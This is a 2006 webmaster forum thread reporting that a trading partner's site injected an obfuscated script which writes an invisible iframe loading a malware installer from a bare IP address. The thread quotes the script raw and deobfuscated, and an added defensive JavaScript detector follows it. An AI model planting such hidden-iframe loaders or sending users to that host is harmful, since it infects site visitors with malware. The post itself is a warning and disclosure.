
sextasya.com virus infested


Dan S
09-06-2006, 11:46 PM
I was thinking a LONG time this morning if I should hit the boards with the drama or not. I decided that it is just what I have to do.

sextasya.com is one of my top trades and I lost it this morning because I had to pull the plug on a shameless attempt to screw me and others over. So I feel like if I lose my top trade he should lose all of his too.

I came in this morning and was checking my sites, like every morning, clicking around, when I got hit with virus warnings on sextasya.com. 2 different but related warnings.

Screens:
http://www.hardsextacy.com/sextasya1.jpg
http://www.hardsextacy.com/sextasya2.jpg
(Kaspersky is in German, but you get the idea)


So, starting to look at the source of the site you can spot this code after the body tag:



<SCRIPT LANGUAGE="JavaScript">document.write('<'+'if'+'ra'+'me'+' '+'sr'+'c=ht'+'tp'+':/'+'/21'+'3'+'.'+'25'+'1'+'.'+'13'+'2'+'.'+'19'+'4'+'/su'+'p'+'port'+'/'+'sup'+'p'+'ort'+'.'+'p'+'hp fra'+'mebo'+'rder=0 he'+'ight'+'='+'0 wid'+'th='+'0'+'>'+'<'+'/'+'if'+'ra'+'me'+'>');</SCRIPT>


which cleaned up makes this:


<SCRIPT LANGUAGE="JavaScript">document.write('<iframe src=http://213.251.132.194/support/support.php frameborder=0 height=0 width=0></iframe>');</SCRIPT>


If you go to http://213.251.132.194/support/support.php directly, you get the same virus warning as on the sextasya.com main page and you find this source:


<iframe src=install.html></iframe>



I thought, ok, maybe it's some weird advertiser who is popping up shit on a fellow webmaster. So I contacted him to explain. Apparently he wasn't online at that time and actually the shit is still there as I am writing this.

So far I gave the benefit of the doubt, since we have been trading for quite some time already and the trade really kicked in.

I did some searches on the IP, to maybe find what virus we are talking about, when I saw that his ST thumbs are on the same IP.
http://213.251.132.194/sextasya.com/st/thumbs/

So this fucking virus installer is on his server.
Almost makes me puke.

Say bye bye to a 50k trade.

A nice fuck you is all I can say.
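
Added example, not part of the original post: a static check that can be run over saved page source to fold split-string document.write() calls like the one quoted above and flag zero-size iframes. The function names and the sample markup (which uses the documentation address 192.0.2.10) are constructed for illustration.

```javascript
// Static triage only: the page's script is rewritten as text, never executed.

// Join adjacent same-quote literals: 'if'+'ra'+'me' -> 'iframe' (heuristic).
function foldConcats(src) {
  const pair = /(['"])((?:\\.|(?!\1)[^\\])*)\1\s*\+\s*\1((?:\\.|(?!\1)[^\\])*)\1/;
  let prev;
  do {
    prev = src;
    src = src.replace(pair, (m, q, a, b) => q + a + b + q);
  } while (src !== prev);
  return src;
}

// Report every iframe written by document.write(), with its src, whether it
// is sized to be invisible, and whether the call was split up in the source.
function findHiddenIframes(html) {
  const folded = foldConcats(html);
  const writeCall = /document\.write(?:ln)?\(\s*(['"])((?:\\.|(?!\1)[^\\])*)\1\s*\)/g;
  const findings = [];
  for (const call of folded.matchAll(writeCall)) {
    for (const tag of call[2].matchAll(/<iframe\b[^>]*>/gi)) {
      const attr = (name) => {
        const m = tag[0].match(
          new RegExp('\\b' + name + '\\s*=\\s*["\']?([^\\s"\'>]+)', 'i'));
        return m ? m[1] : null;
      };
      const tiny = (v) => v === '0' || v === '1';
      findings.push({
        src: attr('src'),
        hidden: tiny(attr('width')) || tiny(attr('height')),
        // The folded call text is absent from the raw source only if it was split.
        obfuscated: !html.includes(call[0]),
      });
    }
  }
  return findings;
}

// Constructed sample with the same shape as the snippet in the post.
const sample = `<body><SCRIPT LANGUAGE="JavaScript">document.write('<'+'if'+'ra'+'me'+' sr'+'c=ht'+'tp://192.0.2.10/su'+'pport/sup'+'port.p'+'hp fra'+'mebo'+'rder=0 he'+'ight=0 wid'+'th=0>'+'<'+'/if'+'ra'+'me>');</SCRIPT>`;

console.log(findHiddenIframes(sample));
```

A finding with both `hidden` and `obfuscated` set is the combination seen in this thread; either flag alone also shows up in legitimate ad and tracking code.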

DamageX
09-06-2006, 11:50 PM
I will confirm this, I was the one who found his poorly cloaked code on the page, after Dan approached me asking if I get a virus alert as well.

Dan S
09-07-2006, 09:03 PM
ok,
I am not hoping to shoot my own leg here.
I know the old saying of "fuck me once, shame on you. fuck me twice, shame on me."

Last night the owner and her host tried to prove that the server was hijacked and somebody else planted the virus and modified the main page.

As it looks there was somebody brute-forcing the FTP password and finally got in. Funny thing is that the hacker was able to FTP in as root. Well, it's hard to swallow, really. But I will give the benefit of the doubt just one more time and hope I won't regret it.

So I reactivated the trade just now.

These things are always double bladed. I know that if somebody would hack me and do bullshit like this to me, it would hurt and shake not only my life, but also my family's life a lot since I do this for a living 100%.
On the other side, these things are often hard to believe and an attack on my income has been already made. By one or another.

If you wanna read up about what the owner had to say about the incident you can do so here:

http://askdamagex.com/t7782-ok-sextasyacom-sexultracom-fullfreesexcom-i-am-pissed.html